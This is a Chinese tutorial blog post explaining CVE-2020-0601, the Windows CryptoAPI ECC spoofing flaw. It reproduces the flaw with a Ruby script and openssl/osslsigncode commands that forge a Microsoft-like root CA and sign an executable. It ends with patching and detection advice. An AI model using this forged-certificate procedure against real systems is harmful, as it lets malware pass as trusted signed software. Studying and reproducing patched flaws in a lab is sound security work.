您可能之前看到過我寫的類似文章,為什么還要重復撰寫呢?只是想更好地幫助初學者了解病毒逆向分析和系統安全,更加成體系且不破壞之前的系列,因此,我重新開設了這個專欄,準備系統整理和深入學習系統安全、逆向分析和惡意代碼檢測,“系統安全”系列文章會更加聚焦,更加系統,更加深入,也是作者的慢慢成長史,換專業確實挺難的,逆向分析也是塊硬骨頭,但我也試試,看看自己未來四年究竟能將它學到什么程度,漫漫長征路,偏向虎山行,享受程序,一起加油~
作者前文介紹了什么是數字簽名,利用Asn1View、PEVie、010Editor等工具進行資料提取和分析,這是全網非常新的一篇文章,希望對您有所幫助,這篇文章將詳細介紹微軟證書漏洞CVE-2020-0601,并講解ECC演算法、Windows驗證機制,復現可執行檔案簽名證書的例子, 這些基礎性知識不僅和系統安全相關,同樣與我們身邊常用的軟體、檔案、作業系統緊密聯系,希望這些知識對您有所幫助,更希望大家提高安全意識,安全保障任重道遠,本文參考了參考文獻中的文章,并結合自己的經驗和實踐進行撰寫,也推薦大家閱讀參考文獻,
文章目錄
- 一.漏洞背景
- 二.漏洞原理
- 1.ECC加密演算法
- 2.Windows證書驗證
- 三.可執行檔案簽名漏洞利用
- 1.證書查看
- 2.環境搭建
- 3.漏洞還原
- 四.防御措施及總結
- 五.總結
從2019年7月開始,我來到了一個陌生的專業——網路空間安全,初入安全領域,是非常痛苦和難受的,要學的東西太多、涉及面太廣,但好在自己通過分享100篇“網路安全自學”系列文章,艱難前行著,感恩這一年相識、相知、相趣的安全大佬和朋友們,如果寫得不好或不足之處,還請大家海涵!
接下來我將開啟新的安全系列,叫“系統安全”,也是免費的100篇文章,作者將更加深入的去研究惡意樣本分析、逆向分析、內網滲透、網路攻防實戰等,也將通過在線筆記和實踐操作的形式分享與博友們學習,希望能與您一起進步,加油~
- 推薦前文:網路安全自學篇系列-100篇
作者的github資源:
- 逆向分析:https://github.com/eastmountyxz/SystemSecurity-ReverseAnalysis
- 網路安全:https://github.com/eastmountyxz/NetworkSecuritySelf-study
- 漏洞復現:https://github.com/eastmountyxz/CVE-2020-0601-EXP
前文分析:
- [系統安全] 一.什么是逆向分析、逆向分析基礎及經典掃雷游戲逆向
- [系統安全] 二.如何學好逆向分析及呂布傳游戲逆向案例
- [系統安全] 三.IDA Pro反匯編工具初識及逆向工程解密實戰
- [系統安全] 四.OllyDbg動態分析工具基礎用法及Crakeme逆向
- [系統安全] 五.OllyDbg和Cheat Engine工具逆向分析植物大戰僵尸游戲
- [系統安全] 六.逆向分析之條件陳述句和回圈陳述句原始碼還原及流程控制
- [系統安全] 七.逆向分析之PE病毒原理、C++實作檔案加解密及OllyDbg逆向
- [系統安全] 八.Windows漏洞利用之CVE-2019-0708復現及藍屏攻擊
- [系統安全] 九.Windows漏洞利用之MS08-067遠程代碼執行漏洞復現及深度提權
- [系統安全] 十.Windows漏洞利用之SMBv3服務遠程代碼執行漏洞(CVE-2020-0796)復現
- [系統安全] 十一.那些年的熊貓燒香及PE病毒行為機理分析
- [系統安全] 十二.熊貓燒香病毒IDA和OD逆向分析(上)病毒初始化
- [系統安全] 十三.熊貓燒香病毒IDA和OD逆向分析(中)病毒釋放機理
- [系統安全] 十四.熊貓燒香病毒IDA和OD逆向分析–病毒釋放程序(下)
- [系統安全] 十五.Chrome瀏覽器保留密碼功能滲透決議、藍屏漏洞及某音樂軟體漏洞復現
- [系統安全] 十六.PE檔案逆向基礎知識(PE決議、PE編輯工具和PE修改)
- [系統安全] 十七.Windows PE病毒概念、分類及感染方式詳解
- [系統安全] 十八.病毒攻防機理及WinRAR惡意劫持漏洞(腳本病毒、自啟動、定時關機、藍屏攻擊)
- [系統安全] 十九.宏病毒之入門基礎、防御措施、自發郵件及APT28宏樣本分析
- [系統安全] 二十.PE數字簽名之(上)什么是數字簽名及Signtool簽名工具詳解
- [系統安全] 二十一.PE數字簽名之(中)Signcode、PEView、010Editor、Asn1View工具用法
- [系統安全] 二十二.PE數字簽名之(下)微軟證書漏洞CVE-2020-0601復現及Windows驗證機制分析
宣告:本人堅決反對利用教學方法進行犯罪的行為,一切犯罪行為必將受到嚴懲,綠色網路需要我們共同維護,更推薦大家了解它們背后的原理,更好地進行防護,該樣本不會分享給大家,分析工具會分享,(參考文獻見后)
一.漏洞背景
2020年1月15日,微軟發布了針對CVE-2020-0601的安全補丁,該漏洞是微軟在實作橢圓曲線加密(ECC)演算法數字證書驗證時產生,位于CryptoAPI.dll檔案,可被利用于偽造來自可信任來源的簽名或證書,并且因其業務特性會衍生出多種攻擊向量,具有極高的可利用價值和極大的潛在破壞力,Win10和windows server 2016 & 2019也都在其影響范圍內,
有意思的是,在微軟發布公告后,NSA也發布了關于CVE-2020-0601漏洞的預警通告,根據通告可以得知,這個漏洞是由NSA率先獨立發現并匯報給微軟的(微軟在報告中對NSA致謝),也被認為是第一個NSA公開披露的軟體系統漏洞,當然也有可能存在其特殊的戰術目的,
該漏洞位于Windows CryptoAPI(Crypt32.dll)驗證橢圓曲線加密演算法證書的方式,可能影響信任的一些實體包括:
- HTTPS連接
- 檔案簽名
- 電子郵件簽名
- 以用戶模式啟動的簽名可執行程式
此外,該漏洞可以讓攻擊者偽造代碼簽名證書對惡意可執行檔案進行簽名,使檔案看似來自可信的來源,例如,可以讓勒索軟體或其他間諜軟體擁有看似有效的證書,從而促使用戶安裝,中間人攻擊并解密用戶連接到受影響軟體的機密資訊也是主要的攻擊場景之一,
目前,支持使用帶有指定引數的ECC密鑰的證書的Microsoft Windows版本會受到影響,包括了Windows 10、Windows Server 2016/2019以及依賴于Windows CryptoAPI的應用程式,而Windows 10 之前的版本,如Windows 7、Windows Server 2008 R2 等均不受該漏洞的影響,因為win7沒有默認添加微軟的ECC根證書,crypt32.dll里面也沒這個hash值,沒法直接對比通過,故不受影響,
二.漏洞原理
該部分主要參考下面兩篇文章,再次感謝,也強烈推薦大家閱讀這兩位老師的博客,花這么多篇幅介紹原理知識,一方面是完善自己的安全知識體系,另一方面只有深入了解原理才能更好地做防御,
- [M01N] CVE-2020-0601 Windows CryptoAPI欺騙漏洞分析 - 綠盟科技老師
- cve-2020-0601 漏洞原理淺述 - 阿魯卡Alluka老師
1.ECC加密演算法
CVE-2020-0601的根源是微軟的加密庫crypt32.dll中橢圓曲線加密演算法的實作問題,首先我們來了解一下橢圓加密演算法的基本原理,
-
基礎知識
ECC私鑰+橢圓曲線=ECC公鑰 -
漏洞成因
微軟的私鑰+微軟選的橢圓曲線=微軟根證書里面的公鑰
黑客的私鑰+黑客選的橢圓曲線=微軟根證書里面的公鑰
不同的橢圓曲線和不同的私鑰,能產生一模一樣的公鑰,win10默認添加了微軟的ECC根證書,在做證書驗證時,會一直驗證到微軟根證書中的公鑰hash值,這個值直接寫在了crypt32.dll里面,驗證時沒有對比是不是同一個橢圓曲線,只對比了公鑰值,導致了黑客拿自己的私鑰簽名,就能偽裝成微軟的簽名,
- ECC演算法
要形象地理解橢圓曲線加密演算法,可以結合圖形來看,以下是一個符合橢圓曲線的方程及影像,
y 2 = x 3 + a x + b y^2 = x^3 + ax + b y2=x3+ax+b
橢圓曲線具有的一些獨特的性質使它適合用于加密演算法:
- 橢圓曲線關于x軸對稱
- 任何一條非垂直的線與曲線最多有三個點相交
- 曲線是光滑的,即曲線的所有點都沒有兩個或者兩個以上的不同的切線
在橢圓曲線上任意兩點A、B(若A、B重合則作A的切線),作直線交于橢圓曲線另一點C’,過C’做y軸的平行線與橢圓曲線交于C點,定義A+B=C,橢圓曲線的加法符合交換律和結合律,
如果A、B是同一個點,則過A作橢圓曲線的切線,以同樣的方法得到對應的結果 C=2A ,
接下來是橢圓曲線加密相關的重點,如果對多個A進行累加,則可依次累加連線得到nA的值 ,
- (1) 起點為A,終點D=3A,階為3 ,
- (2) 起點為A,終點G=4A,階為4,
橢圓曲線加密演算法的數學依據 :
考慮K=kG,其中K、G為橢圓曲線Ep(a,b)上的點,n為G的階,k為小于n的整數,給定k和G,根據加法法則計算K很容易(逐次求解);但反過來,給定K和G,求k就非常困難,因為實際使用中的ECC原則上把私鑰k取得相當大,n也相當大,且橢圓曲線不再連續而是在實數內離散的值,要把n個解點逐一算出幾乎是不可能的,
- 點G稱為基點
- k(k<n)為私有密鑰
- K為公開密鑰
ECC和RSA加密演算法對比:
橢圓曲線加密演算法(ECC)和RSA同樣是一種公開密鑰加密技術,對原始資料以公鑰加密,以私鑰解密,即便攻擊者獲取密文和公鑰也無法(在合理的時間或代價下)解密獲取明文,ECC常被應用于數字簽名,以私鑰加密生成簽名,以公鑰解密驗證簽名,如果和原文一樣則簽名驗證成功,公開密鑰加密之所以可靠是因為它們利用了公鑰密碼領域的單向函式原理,正向操作非常簡單,而逆向操作非常困難,由G(基點)出發,進行k(私鑰)次變換,很容易地得到終點K(公鑰)的值,
已知起點G(基點)和終點K(公鑰),要逆推得到移動次數k(私鑰)則是一個很難的問題,相比傳統RSA加密演算法,橢圓加密演算法具有著天生的優勢,橢圓加密演算法的逆向程序相比RSA有著更大的時間復雜度,在密鑰長度相同的情況下,橢圓加密演算法相比RSA具有更好的安全強度, 一般認為,160位元的橢圓曲線密鑰即可提供與1024位元的RSA密鑰相當的安全強度,
較短的密鑰也意味著更少的存盤空間、更快的加解密速度和更少的帶寬消耗,正因為橢圓加密演算法的這些優勢,它被用于Windows的簽名系統、https的證書、位元幣系統和中國的二代身份證系統中,
雖然橢圓曲線加密演算法具有著許多優勢,純演算法角度攻破難度極大,微軟對此演算法的實作的缺漏卻給漏洞利用提供了可乘之機,回到橢圓曲線加密最基本的等式 K=kG,首先需要明確的是,雖然對于給定的基點G和公鑰K,要求解私鑰k很困難,但是如果可以任意指定基點G,要構造一對k和G使等式成立卻極其簡單,最簡單的情況,令基點G=K,則私鑰k=1,這樣一對基點和私鑰可以使等式成立,也是有效的解,
在正常的標準橢圓曲線演算法中,基點G并不是隨意指定的,而是有固定的值(標準檔案會對基點G等引數的選擇做出規定),例如在secp256r1版本的橢圓曲線演算法中,基點G應當為標準規定的固定值,如果對引數不加驗證,使得用戶可以自定義傳入的基點G值(作為函式的引數),上面的私鑰k=1的特殊解即可成立,
在有漏洞版本的crypt32.dll中驗證使用ECC演算法簽名部分的函式恰恰是這個情況,原先的函式未加引數驗證,參與計算的基點G的內容由被驗證的證書隨意指定,使未授權的證書能夠構建私鑰k=1的特殊解來成功通過橢圓加密演算法的簽名驗證的程序,
2.Windows證書驗證
以SSL協議為例,講解Windows如何進行證書驗證,比如,小明(m)在某電商(x)網站上購買了一本書,這時就呼叫了SSL協議進行通訊,建立SSL協議的步驟總結為下圖,
基本步驟包括:
- ① 打招呼: 小明和電商互相介紹自己,小明和電商協商好以后的步驟里將使用到的特定密碼演算法,在本漏洞中,該演算法為ECC加密演算法,(該步驟沒有利用密碼工具)
- ② 身份驗證: 電商向小明驗證自己的身份,電商發送包含自己的公鑰的證書,該證書由權威的第三方證書機構(CA)頒發,小明使用CA的公開驗證密鑰,驗證證書中對PK的簽名,(漏洞觸發地方)
- ③ 資訊加密: 由小明生成一個隨機的密鑰MS,該密鑰用于生成對雙方傳輸的資訊進行對稱加密的K1與K2,MS由小明獲得的公鑰進行加密并交給電商,電商通過手中的私鑰解密獲得MS,這時雙方都獲得了用于進行加密通訊的密鑰,
注意:
- 在SSL會話程序中,只有電商一方被要求提供證書,小明可能根本沒有公鑰(或證書),這和我們平時去小賣部買東西一樣,銷售方需要提供銷售許可, 而你只需要付錢就可以了,
- 該漏洞的觸發點在于 第三方權威機構(Windows) 在步驟②驗證證書時產生的邏輯漏洞,使得攻擊者可以通過偽造證書將自身偽裝成電商, 與小明 進行通訊,從而達到騙財騙色騙資訊的目的,
- 通過及時更新微軟補丁包可以有效防止上述情況的發生,
接著我們分享微軟驗證證書的機制,以及其存在的邏輯漏洞,
- 在Windows系統訪問一個網站(例Github.com)時, 該網站會向Windows系統發送由第三方權威機構(CA)簽署的網站證書,
- Windows系統則會驗證該證書是否由CA頒發,若驗證通過,則Windows系統與網站成功建立TLS鏈接,
- 為了方便下一次更快的訪問,Windows將驗證成功的證書放入記憶體中一塊Certificate Cache(證書快取)中,在下一次校驗時,如果該證書存在于快取中,則直接取快取中的值進行校驗,這里利用CVE-2020-0601,
- 在成功快取證書資料后,根據下面描述的Windows證書快取機制,惡意網站可以偽造虛假的網站(例github.com)證書且通過Windows驗證,將自身偽裝成合法網站,
- 當 Windows 接收到新的證書時,Windows 將新接收的證書與已快取證書的證書的公鑰進行遍歷對比,尋找匹配的值,
- 偽造的惡意證書與Windows系統中的快取證書有同樣的公鑰,但Curve項沒有在校驗范圍內,所以可以通過構造自定義Curve來偽造證書,使得證書驗證流程依然成立,但通過驗證的證書已經不是之前成功驗證的安全證書,
寫到這里,如果您懵圈了,沒關系!我也哭暈了好幾次,都發求救貼了,接著我們看看實際操作吧~
三.可執行檔案簽名漏洞利用
1.證書查看
首先,我帶領大家看看Windows證書,運行中輸入“certmgr.msc”,可以看到這里面有5個系統默認的ECC簽名的根證書,如下圖所示,
我們隨意匯出其中一個根證書,匯出直接選擇Base64編碼那個就行,
可以看到匯出的ECC密鑰證書如下圖所示,包括證書的有效期等資訊,這就是微軟在實作橢圓曲線加密(ECC)演算法的數字證書,位于CryptoAPI.dll檔案,也是被我們利用來偽造可信任來源的簽名漏洞,
同樣,我們可以通過Powershell(其用法推薦前文)查看默認的根證書,
dir cert:\localmachine\root | Where-Object { $_.FriendlyName -like "*ECC*" }
2.環境搭建
- Linux系統、Windows系統WSL軟體(Windows Subsystem for Linux)
- Ruby環境、Python環境
- Github資源:main.rb、openssl_cs.conf、簽名證書
- 可執行exe檔案(用于簽名
由于作者是Windows環境,但需要運行Linux命令,所以這里安裝了Windows Subsystem for Linux軟體,
第一步,打開應用商城搜索“WSL”,可根據自己需求選擇安裝一個或多個Linux系統,
第二步,安裝完成后可以在開始選單的最近添加中打開Ubuntu,第一次打開Ubuntu時,會提示你創建新的用戶賬戶和密碼,這個用戶賬戶只是普通的非管理員用戶,如果要提升權限,需要使用sudo命令,
下面可以測驗該環境已經搭建成功,我們能在Windows系統下運行Linux,
第三步,我們復制檔案進入,作者使用WSL,主要還因為它的另一個優勢,能夠訪問Windows系統的內容,靈活復制和切換檔案,
- (1) 可以在wsl終端輸入以下命令 cd /mnt
- (2) 可以在wsl終端輸入以下命令 explorer.exe .
- (3) 復制ca.cer檔案
路徑為:\wsl$\Ubuntu\home\yxz
第四步,使用openssl查看證書資訊的內容,后面我們會反復使用該命令,
openssl x509 -in ca.cer -text -noout
在計算機網路上,OpenSSL是一個開放源代碼的軟體庫包,應用程式可以使用這個包來進行安全通信,避免竊聽,同時確認另一端連接者的身份,這個包廣泛被應用在互聯網的網頁服務器上,
3.漏洞還原
接下來將詳細講解如何還原可執行檔案簽名證書偽裝漏洞,
第一步,安裝Ruby環境并測驗,
- 安裝環境:sudo apt install ruby
- 查看版本:ruby -v
- 創建檔案:touch HelloWorld.ry
- 編輯代碼:vim HelloWorld.ry
- 運行代碼:ruby HelloWorld.ry
第二步,提取ECC根證書公鑰資訊,
將main.rb檔案和匯出的微軟ECC簽名證書檔案復制或上傳至Linux系統或WSL,注意,這里的ECC證書也可以使用上面我們匯出的那個檔案,
接著運行ruby代碼,
ruby main.rb ./MicrosoftECCProductRootCertificateAuthority.cer
此時生成“spoofed_ca.key”公鑰檔案
main.rb代碼如下,設定私鑰為1,使得加密等式成立,并生成證書公鑰檔案,
require 'openssl'
raw = File.read ARGV[0] # 讀取使用ECC演算法的證書檔案
ca = OpenSSL::X509::Certificate.new(raw) # 讀取使用ECC演算法的證書
ca_key = ca.public_key # 從證書中提取公鑰ca_key
ca_key.private_key = 1 # 設定私鑰為1,使得公鑰K==1*基點G的等式成立
group = ca_key.group
group.set_generator(ca_key.public_key, group.order, group.cofactor)
group.asn1_flag = OpenSSL::PKey::EC::EXPLICIT_CURVE
ca_key.group = group # 利用構建的假基點G和假密鑰k設定新group
File.open("spoofed_ca.key", 'w') { |f| f.write ca_key.to_pem } # 將新的group寫入檔案
第三步,基于此密鑰生成一個新的x509證書,這將是我們自己的欺騙性CA,
openssl req -new -x509 -key spoofed_ca.key -out spoofed_ca.crt
注意,國家、地區、作者可以隨意填寫,此時生成“spoofed_ca.crt”公鑰檔案,
第四步,生成一個新密鑰,該密鑰可以是您想要的任何型別,它將用于創建代碼簽名證書,我們將使用自己的CA對其進行簽名,
openssl ecparam -name secp384r1 -genkey -noout -out cert.key
此時生成“cert.key”新密鑰檔案,
第五步,接下來創建一個新的證書簽名請求(CSR),該請求通常會發送到受信任的CA,但是由于存在欺騙請求,因此我們可以自己對其進行簽名,
openssl req -new -key cert.key -out cert.csr -config openssl_cs.conf -reqexts v3_cs
注意,需要復制openssl_cs.conf檔案進去,此時生成“cert.csr”檔案,
第六步,使用我們的欺騙性CA和CA密鑰簽署新的CSR,該證書將在2047年到期,而真正的受信任Microsoft CA將在2043年到期,
openssl x509 -req -in cert.csr -CA spoofed_ca.crt -CAkey spoofed_ca.key -CAcreateserial -out cert.crt -days 10000 -extfile openssl_cs.conf -extensions v3_cs
生成“cert.crt”簽名證書檔案,
第七步,將證書的密鑰和欺騙性的CA打包到一個PKCS12檔案中,以對可執行檔案進行簽名,
openssl pkcs12 -export -in cert.crt -inkey cert.key -certfile spoofed_ca.crt -name "Code Signing" -out cert.p12
生成“cert.p12”名證書檔案,
第八步,用PKCS12檔案簽名可執行檔案,
osslsigncode sign -pkcs12 cert.p12 -n "Signed by ollypwn" -in python.exe -out python_signed.exe
注意,osslsigncode可能需要安裝,如下所示,
用PKCS12檔案簽名可執行檔案,最終生成“python_signed.exe”簽名可執行檔案,
第九步,檔案右鍵”屬性“打開,如下所示,多了”數字簽名“且能看查看”詳細資訊”,
點擊”查看證書”,可以看到具體資訊,比如2047年到期,頒發者為我們設定的“hacker”,以及設定的簽名資訊,并且證書是可靠地,該可執行檔案的數字簽名校驗通過,并且成功欺騙了系統,
如果更新補丁知乎,可執行檔案的數字簽名會無法驗證,
四.防御措施及總結
緩解措施
快速采用補丁是目前已知較好的緩解措施,盡管尚未出現公開的攻擊方式和案例,但建議大家及時安裝安全更新,更新后,當檢測到有人試圖利用CVE-2020-0601進行攻擊時,系統將在每次重新啟動Windows日志后在事件查看器中生成事件ID,
安全建議
除了安裝修補程式之外,企業還可以采取其他措施保護端點,比如:
- (1) 從網路流量中提取證書,檢查可疑的屬性;
- (2) 通過執行TLS檢查,不使用Windows進行證書驗證的代理設備承載流量;
- (3) 在企業內部部署私有根證書頒發機構,并且在特定計算機/服務器位置控制第三方軟體的部署和使用;
- (4) 符合條件的企業可以申請加入微軟 Security Update Validation Program (SUVP) 或 Microsoft Active Protections Program (MAPP),從而提前從微軟獲得安全更新以進行相關的測驗分析,
后續作者將嘗試利用該漏洞復現HTTPS劫持案例,真的花費了很多精力,希望您喜歡,
完整命令:
ruby main.rb ./MicrosoftECCProductRootCertificateAuthority.cer
openssl req -new -x509 -key spoofed_ca.key -out spoofed_ca.crt
openssl ecparam -name secp384r1 -genkey -noout -out cert.key
openssl req -new -key cert.key -out cert.csr -config openssl_cs.conf -reqexts v3_cs
openssl x509 -req -in cert.csr -CA spoofed_ca.crt -CAkey spoofed_ca.key -CAcreateserial -out cert.crt -days 10000 -extfile openssl_cs.conf -extensions v3_cs
openssl pkcs12 -export -in cert.crt -inkey cert.key -certfile spoofed_ca.crt -name "Code Signing" -out cert.p12
osslsigncode sign -pkcs12 cert.p12 -n "Signed by ollypwn" -in python.exe -out python_signed.exe
五.總結
文章寫到這里,就介紹完畢,希望對您有所幫助,內容包括:
- 一.漏洞背景
- 二.漏洞原理
1.ECC加密演算法
2.Windows證書驗證 - 三.可執行檔案簽名漏洞利用
1.證書查看
2.環境搭建
3.漏洞還原 - 四.防御措施及總結
同時總結下這一年網路安全和系統安全的學習感受,作為網路安全的初學者,我寫了近150篇安全的文章,從Web滲透到CTF,從二進制分析到惡意代碼檢測,從CVE漏洞還原到木馬病毒及論文,但還是覺得自己非常菜,至今未進入安全圈,每當我要測驗一個網站或復現一個漏洞時,都會身心俱疲,甚至想放棄,本來一個很小的問題,會牽扯出無數知識點,需要去一個個去學習、去攻克,包括密碼演算法、IP段和埠、安全工具、Python腳本、Powershell、openssl命令、外網內網、系統漏洞等等,
哎,自己也寫了十年的代碼了,即使拿到很難得資料挖掘的專案,都能一點點去克服最終實作,但安全確實不一樣,可能一個漏洞涉及的已經是另一個領域,當然自己接觸得比較少,然而,每當復現出一個漏洞或拿下一個網站時,這幸福感也是其他程式無法替代的,恨不得讓全世界都知道這是我做的,所以,給安全初學者一些建議,多實踐、別氣餒、多交流,多看安全網站和黑客大佬的文章、教程和視頻,多關注CVE漏洞和新新聞,當你做不出來的時候,我這只菜鳥也在電腦的另一頭撞墻了,同時,網路空間安全真的非常重要,只有不斷地真正實踐和總結,才能成為一名優秀的白帽子,我會向著這個方向努力的,也會分享更多安全文章,希望您喜歡!一起加油~
歡迎大家討論,是否覺得這系列文章幫助到您!如果存在不足之處,還請海涵,任何建議都可以評論告知讀者,共勉~
- 逆向分析:https://github.com/eastmountyxz/SystemSecurity-ReverseAnalysis
- 網路安全:https://github.com/eastmountyxz/NetworkSecuritySelf-study
- 漏洞復現:https://github.com/eastmountyxz/CVE-2020-0601-EXP
2020年8月18新開的“娜璋AI安全之家”,主要圍繞Python大資料分析、網路空間安全、人工智能、Web滲透及攻防技術進行講解,同時分享CCF、SCI、南核北核論文的演算法實作,娜璋之家會更加系統,并重構作者的所有文章,從零講解Python和安全,寫了近十年文章,真心想把自己所學所感所做分享出來,還請各位多多指教,真誠邀請您的關注!謝謝,
(By:Eastmount 2021-02-17 深夜1點寫于貴陽 http://blog.csdn.net/eastmount )
參考文獻:
[1] https://github.com/ollypwn/CurveBall
[2] https://github.com/kudelskisecurity/chainoffools
[3] https://github.com/saleemrashid/badecparams
[4] 綠盟博客:http://blog.nsfocus.net/cve-2020-0601-windows-cryptoapi欺騙漏洞分析/
[5] FreeBuf博客:https://www.freebuf.com/vuls/225524.html
[6] 奇安信博客:https://www.freebuf.com/column/225457.html
[7] 奇安信博客:https://www.freebuf.com/vuls/225879.html
[8] Evi1cg’s博客:https://evi1cg.me/archives/cve_2020_0601.html
[9] CE653A博客:https://www.cnblogs.com/dgjnszf/p/12256824.html
[10] 阿魯卡博客:https://blog.csdn.net/weixin_43899764/article/details/104029814
[11] https://www.bilibili.com/video/av84233595/?redirectFrom=h5
[12] samsho2博客:https://blog.csdn.net/samsho2/article/details/104048261
[13] 安全客分析:https://www.anquanke.com/post/id/197520
[14] https://blog.csdn.net/Eastmount
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/260715.html
標籤:其他
下一篇:位元組跳動「50道高頻演算法題」